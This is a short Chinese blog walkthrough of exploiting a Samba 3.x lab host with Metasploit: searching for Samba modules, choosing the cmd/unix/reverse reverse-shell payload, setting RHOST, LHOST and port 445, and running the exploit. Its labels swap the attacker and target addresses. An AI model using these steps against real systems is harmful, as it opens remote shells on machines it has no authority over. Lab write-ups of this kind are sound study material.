Samba漏洞利用

Samba简介

Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件，有服务端和客户端程序构成。随着Linux的普及，如何共享Linux下的文件成为用户关心的问题。其实，几乎所有的Linux发行套件都提供了一个很好的工具Samba——通过它可以轻松实现文件共享。

samba主要功能

通用lnternet文件系统（CIFS）也称为服务器信息块（SMB），是适用于MicrosoftWindows服务器和客户端的标准文件和打印机共享系统。
Samba服务可用于将Linux文件系统作为CIFS/SMB网络文件共享进行共享，并将Linux打印机作为CIFS/SMB打印机共享进行共享。

漏洞说明

从扫描结果中发现主机运行着Samba 3.x服务。这个版本的服务纯在复线的漏洞

实验开始

首先打开msf
search samba 命令搜索Samba的漏洞利用模块，并选择合适的漏洞利用模块，如图所示。

因为我们测试的是liunx 系统的所以选择最新的时间的成功率高

使用如下图所示的命令即可查看该漏洞利用模块下可供选择的攻击载荷模块，因为目标是Linux机器，因此一定要选择Linux的攻击载荷。
这里使用如下图所示的命令选择基础的cmd/unix/reverse反向攻击载荷模块。

设置攻击机ip
set RHOST 192.168.191.128
设置靶机ip
set LHOST 192.168.191.129
设置 漏洞利用端口号（默认139）
set Rport 445
设置完可以使用show options命令再次确认参数是否已设置正确。

run 或 exploit 攻击

Contents

1. Samba简介
2. samba主要功能
3. 漏洞说明
4. 实验开始

Original link: http://www.lovexue.cn/2022/03/04/Samba 漏洞利用/

Copyright Notice: 转载请注明出处.